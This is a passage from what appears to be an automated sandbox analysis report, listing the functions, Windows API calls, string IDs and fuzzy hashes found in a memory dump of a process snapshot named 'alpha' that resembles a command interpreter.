                                • Part of subcall function 00007FF744F0D3F0: wcschr.MSVCRT ref: 00007FF744F0D4EE
                                • Part of subcall function 00007FF744F0D3F0: iswspace.MSVCRT ref: 00007FF744F0D54D
                                • Part of subcall function 00007FF744F0D3F0: wcschr.MSVCRT ref: 00007FF744F0D569
                                • Part of subcall function 00007FF744F0D3F0: wcschr.MSVCRT ref: 00007FF744F0D58C
                              • iswspace.MSVCRT ref: 00007FF744F17EEE
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: wcschr$Heapiswspace$AllocProcess
                              • String ID: A
                              • API String ID: 3731854180-3554254475
                              • Opcode ID: 41f65c48cf3e37159ed1ee97e5992bf17c61e45d372bd9afbfce449b4f210755
                              • Instruction ID: 85cf29677a1db540bd2eb2a6c15a20ac2e49462d2df349e5e77da16022986b9d
                              • Opcode Fuzzy Hash: 41f65c48cf3e37159ed1ee97e5992bf17c61e45d372bd9afbfce449b4f210755
                              • Instruction Fuzzy Hash: 81A16D2290DA82CAE760BF52A49067AF6A0FB55790F888035DE8D477DDDF3CA445E720
                              Function 00007FF744F2A58C Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 97memoryfileCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Heap$File$Process$AllocCloseCreateFreeHandlePointerRead
                              • String ID: PE
                              • API String ID: 2941894976-4258593460
                              • Opcode ID: 331757eb63d1f0c0e0f6f41cd200ca790172e856099f574e6941fdd4e3218fed
                              • Instruction ID: 4dd6f995f69fc7891e918e7167e2190e00c22b5c7419d57fb063f96c21bc480e
                              • Opcode Fuzzy Hash: 331757eb63d1f0c0e0f6f41cd200ca790172e856099f574e6941fdd4e3218fed
                              • Instruction Fuzzy Hash: 0F414261A0C651C7E720BF62E490279FAA0FB89B90F884130DE5D42BD9DF3DE545DB20
                              Function 00007FF744F29B0C Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 261registryCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Enum$Openwcsrchr
                              • String ID: %s=%s$.$\Shell\Open\Command
                              • API String ID: 3402383852-1459555574
                              • Opcode ID: c43f82accf2197ad62986fa4fadf1decf1ac45d35886ea9e70cf93cd770afeea
                              • Instruction ID: e22584f8ea8b91f28cfba3215280dbf6fcfd0b0cc83845eab2d974f05baff222
                              • Opcode Fuzzy Hash: c43f82accf2197ad62986fa4fadf1decf1ac45d35886ea9e70cf93cd770afeea
                              • Instruction Fuzzy Hash: 03A18F61B0D642C2EB51BF56A0906BAE2A0FF85B90FC84535DE4D07BDCDE7DE941A320
                              Function 00007FF744F0F173 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 119COMMON
                              Download Yara Rule
                              APIs
                              • iswdigit.MSVCRT(?,?,00000000,00007FF744F11F69,?,?,?,?,?,?,?,00007FF744F0286E,00000000,00000000,00000000,00000000), ref: 00007FF744F0F0D6
                              • iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF744F0E626,?,?,00000000,00007FF744F11F69), ref: 00007FF744F0F1BA
                              • wcschr.MSVCRT(?,?,00000000,00007FF744F11F69,?,?,?,?,?,?,?,00007FF744F0286E,00000000,00000000,00000000,00000000), ref: 00007FF744F0F1E7
                              • iswdigit.MSVCRT(00000000,00000000,?,00000000,?,00007FF744F0E626,?,?,00000000,00007FF744F11F69), ref: 00007FF744F0F1FF
                              • iswdigit.MSVCRT(?,?,00000000,00007FF744F11F69,?,?,?,?,?,?,?,00007FF744F0286E,00000000,00000000,00000000,00000000), ref: 00007FF744F0F2BB
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: iswdigit$iswspacewcschr
                              • String ID: )$=,;
                              • API String ID: 1959970872-2167043656
                              • Opcode ID: 4f4e76ffb3d3d3f1682d86852f25dc45ca8acbfdb86516db9a39298bef1f035d
                              • Instruction ID: c8919e68bff2b47a5e4b0fcea17178696a64c3ac30c23caf54151209c4d6b29d
                              • Opcode Fuzzy Hash: 4f4e76ffb3d3d3f1682d86852f25dc45ca8acbfdb86516db9a39298bef1f035d
                              • Instruction Fuzzy Hash: 88416A65E0C652C6FB64BF12A598379F6A0AF90751FCC9031CE88422E8DF7CA495A730
                              Function 00007FF744F2BA40 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 103COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: ErrorLast$InformationVolumeiswalphatowupper
                              • String ID: %04X-%04X$:
                              • API String ID: 930873262-1938371929
                              • Opcode ID: 1b48387342add1d7daed67bb80fe16c2eacc5f7ab2e1033d601e8994222be5e6
                              • Instruction ID: 626f5a751669813aafbc07313dbe450b460fb27dca45836db7d80f6f7bd4554a
                              • Opcode Fuzzy Hash: 1b48387342add1d7daed67bb80fe16c2eacc5f7ab2e1033d601e8994222be5e6
                              • Instruction Fuzzy Hash: 90414C21A1CA42D2EB20BF62E4812BAE3A0FB85751FC94135DE9E426DDDF3DD544A720
                              Function 00007FF744F16A28 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 80COMMON
                              Download Yara Rule
                              APIs
                              • iswdigit.MSVCRT(?,?,00000000,00007FF744F168A3,?,?,?,?,?,?,?,00000000,?,00007FF744F163F3), ref: 00007FF744F16A73
                              • wcschr.MSVCRT(?,?,00000000,00007FF744F168A3,?,?,?,?,?,?,?,00000000,?,00007FF744F163F3), ref: 00007FF744F16A91
                              • wcschr.MSVCRT(?,?,00000000,00007FF744F168A3,?,?,?,?,?,?,?,00000000,?,00007FF744F163F3), ref: 00007FF744F16AB0
                              • wcschr.MSVCRT(?,?,00000000,00007FF744F168A3,?,?,?,?,?,?,?,00000000,?,00007FF744F163F3), ref: 00007FF744F16AE3
                              • wcschr.MSVCRT(?,?,00000000,00007FF744F168A3,?,?,?,?,?,?,?,00000000,?,00007FF744F163F3), ref: 00007FF744F16B01
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: wcschr$iswdigit
                              • String ID: +-~!$<>+-*/%()|^&=,
                              • API String ID: 2770779731-632268628
                              • Opcode ID: 04afb1219d2367be7b294e05ecf67b56e7fd74584ee28e872d0024d55c3108eb
                              • Instruction ID: effe43d12c9b242c3720abc3283af76f7e8fdc4af1f499ed7bcf7c80ff681041
                              • Opcode Fuzzy Hash: 04afb1219d2367be7b294e05ecf67b56e7fd74584ee28e872d0024d55c3108eb
                              • Instruction Fuzzy Hash: 6B31EC2260DA56C6E750BF12E490279B6F0FB45F85B898135DE5E43398EF3CE815A720
                              Function 00007FF744F11630 Relevance: 10.7, APIs: 7, Instructions: 208memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,00000000,?,00007FF744F114D6,?,?,?,00007FF744F0AA22,?,?,?,00007FF744F0847E), ref: 00007FF744F11673
                              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF744F114D6,?,?,?,00007FF744F0AA22,?,?,?,00007FF744F0847E), ref: 00007FF744F1168D
                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF744F114D6,?,?,?,00007FF744F0AA22,?,?,?,00007FF744F0847E), ref: 00007FF744F11757
                              • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF744F114D6,?,?,?,00007FF744F0AA22,?,?,?,00007FF744F0847E), ref: 00007FF744F1176E
                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF744F114D6,?,?,?,00007FF744F0AA22,?,?,?,00007FF744F0847E), ref: 00007FF744F11788
                              • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF744F114D6,?,?,?,00007FF744F0AA22,?,?,?,00007FF744F0847E), ref: 00007FF744F1179C
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Heap$Process$Alloc$Size
                              • String ID:
                              • API String ID: 3586862581-0
                              • Opcode ID: de24f60fade2ea1a8e9170476ea6e59d916578871a0233016ef2ac0a8793df42
                              • Instruction ID: 6b9ee04aab8ce0b254235bed3acaca53cdf8a9d7e3e82c3b704dad8e1ff7173e
                              • Opcode Fuzzy Hash: de24f60fade2ea1a8e9170476ea6e59d916578871a0233016ef2ac0a8793df42
                              • Instruction Fuzzy Hash: 23916F21A0DA46C1EB54BF16A580679B6B0FB48B95F9D8135DE4E033E9DF3CE845E320
                              Function 00007FF744F186F0 Relevance: 10.7, APIs: 7, Instructions: 154COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: ConsoleErrorOpenTitleTokenwcsstr$CloseFormatFreeLastLocalMessageProcessStatusThread
                              • String ID:
                              • API String ID: 1313749407-0
                              • Opcode ID: ee6218c461c646e929341b9db92bfc99d61f95d83b881389c5cff3e0ca217c2e
                              • Instruction ID: 7c5ccf3fa404b3ebb3a8cd3166f6ff99ea2509081dc24c35c25ba54863da6884
                              • Opcode Fuzzy Hash: ee6218c461c646e929341b9db92bfc99d61f95d83b881389c5cff3e0ca217c2e
                              • Instruction Fuzzy Hash: DF51A321A0DA82C2EB54BF139594179E6A1FF49BA0FCC5130DD1E077D9DF3CE841A220
                              Function 00007FF744F0F5D7 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 91COMMON
                              Download Yara Rule
                              APIs
                              • iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF744F0E626,?,?,00000000,00007FF744F11F69), ref: 00007FF744F0F1BA
                              • wcschr.MSVCRT(?,?,00000000,00007FF744F11F69,?,?,?,?,?,?,?,00007FF744F0286E,00000000,00000000,00000000,00000000), ref: 00007FF744F0F1E7
                              • iswdigit.MSVCRT(00000000,00000000,?,00000000,?,00007FF744F0E626,?,?,00000000,00007FF744F11F69), ref: 00007FF744F0F1FF
                              • iswdigit.MSVCRT(?,?,00000000,00007FF744F11F69,?,?,?,?,?,?,?,00007FF744F0286E,00000000,00000000,00000000,00000000), ref: 00007FF744F0F2BB
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: iswdigit$iswspacewcschr
                              • String ID: )$=,;
                              • API String ID: 1959970872-2167043656
                              • Opcode ID: e8a5d63c360e4c13ef561f3ce3dd80187a3c2d8689f5c743dd181e811bfffbc3
                              • Instruction ID: ea862ab825ff82cdb19ccaddc6d8d5768ed13324faf621cabc5491e4c4ba097c
                              • Opcode Fuzzy Hash: e8a5d63c360e4c13ef561f3ce3dd80187a3c2d8689f5c743dd181e811bfffbc3
                              • Instruction Fuzzy Hash: 4A413665E0C616D6FB64BF13A5D8279B6A0AFA0755FCC9035CE8D021ECCF7CA485A630
                              Function 00007FF744F291B8 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: _wcsnicmpfprintfwcsrchr
                              • String ID: CMD Internal Error %s$%s$Null environment
                              • API String ID: 3625580822-2781220306
                              • Opcode ID: 9798a54e4fc5b33e689a2c9d89df2130ab496e8d723cbfb9f498f453c0192420
                              • Instruction ID: 8db3748b5cf487d76d1862f64ddc651fee1ab6b566f55aa7c79ef14803870df8
                              • Opcode Fuzzy Hash: 9798a54e4fc5b33e689a2c9d89df2130ab496e8d723cbfb9f498f453c0192420
                              • Instruction Fuzzy Hash: AC31AD21B0C646C2FB14BF43A5906BAB2A0FB45B94F885134CE1D17BE9EE3DE445D320
                              Function 00007FF744F05984 Relevance: 9.1, APIs: 6, Instructions: 142COMMON
                              Download Yara Rule
                              APIs
                              • _get_osfhandle.MSVCRT ref: 00007FF744F23687
                              • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF744F0260D), ref: 00007FF744F236A6
                              • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF744F0260D), ref: 00007FF744F236EB
                              • _get_osfhandle.MSVCRT ref: 00007FF744F23703
                              • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF744F0260D), ref: 00007FF744F23722
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Console$Write_get_osfhandle$Mode
                              • String ID:
                              • API String ID: 1066134489-0
                              • Opcode ID: 4c1f695bad35c7bf589eba106c736ecb6e681f2494b966e2c9ca81186bfba4b7
                              • Instruction ID: 03952be89b5e5851796d700cb64652f9ae7a22874f8080bf0615f3c3faab3b7b
                              • Opcode Fuzzy Hash: 4c1f695bad35c7bf589eba106c736ecb6e681f2494b966e2c9ca81186bfba4b7
                              • Instruction Fuzzy Hash: A15191A1B0C642C7EB24BF23948457AEAA5FB45B90F8C4435DE4A077D8DF3DE440AB21
                              Function 00007FF744F136EC Relevance: 9.1, APIs: 6, Instructions: 93fileCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: FileWrite$ByteCharMultiWide$_get_osfhandle
                              • String ID:
                              • API String ID: 3249344982-0
                              • Opcode ID: 51d05573790b3cf5d3d64b049944166340f1b2bbc10c5d821001f089b8cff74b
                              • Instruction ID: 578939e4242fb67fa47df001270a7bbdf748ec297657d080c39c07082e531b99
                              • Opcode Fuzzy Hash: 51d05573790b3cf5d3d64b049944166340f1b2bbc10c5d821001f089b8cff74b
                              • Instruction Fuzzy Hash: FD411D7261CA42C7F310AF12A884769BAA4FB59B95F884235DE8907BD8CF3CD5549B10
                              Function 00007FF744F089C0 Relevance: 9.1, APIs: 6, Instructions: 85COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: memset$DriveErrorInformationLastTypeVolume
                              • String ID:
                              • API String ID: 850181435-0
                              • Opcode ID: 41e637cf901b3345656d12757c0875431f92b4df5430d67bb2a32cad95087ec1
                              • Instruction ID: a25159a1a3ac335a3f46242e936a41f15642525bb5f6a23aebf290d83171d45b
                              • Opcode Fuzzy Hash: 41e637cf901b3345656d12757c0875431f92b4df5430d67bb2a32cad95087ec1
                              • Instruction Fuzzy Hash: E1415E3261CBC1CAE760AF22D8842E9B7A4FB89B44FC94525DE4D4BB98CF38D545D710
                              Function 00007FF744F2BE30 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 60COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: _wcsicmpwcschr$Heap$AllocProcessiswspace
                              • String ID: KEYS$LIST$OFF
                              • API String ID: 411561164-4129271751
                              • Opcode ID: b81e55aabf7d667b35b65fc1e051a77d11be73535259418c150144ebfd362279
                              • Instruction ID: 234286788b9ec5b3d94f46992f5df923af23bde49a8f9ae562fe3542a5575cac
                              • Opcode Fuzzy Hash: b81e55aabf7d667b35b65fc1e051a77d11be73535259418c150144ebfd362279
                              • Instruction Fuzzy Hash: 89214D20A1CA02C2FB54BF27A4C5175A6A1FB84750FC99631CE1E462EDDE7DE544A620
                              Function 00007FF744F101B8 Relevance: 9.1, APIs: 6, Instructions: 57COMMON
                              Download Yara Rule
                              APIs
                              • _get_osfhandle.MSVCRT ref: 00007FF744F101C4
                              • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF744F1E904,?,?,?,?,00000000,00007FF744F13491,?,?,?,00007FF744F24420), ref: 00007FF744F101D6
                              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,00007FF744F1E904,?,?,?,?,00000000,00007FF744F13491,?,?,?,00007FF744F24420), ref: 00007FF744F10212
                              • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF744F1E904,?,?,?,?,00000000,00007FF744F13491,?,?,?,00007FF744F24420), ref: 00007FF744F10228
                              • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,00007FF744F1E904,?,?,?,?,00000000,00007FF744F13491,?,?,?,00007FF744F24420), ref: 00007FF744F1023C
                              • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF744F1E904,?,?,?,?,00000000,00007FF744F13491,?,?,?,00007FF744F24420), ref: 00007FF744F10251
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
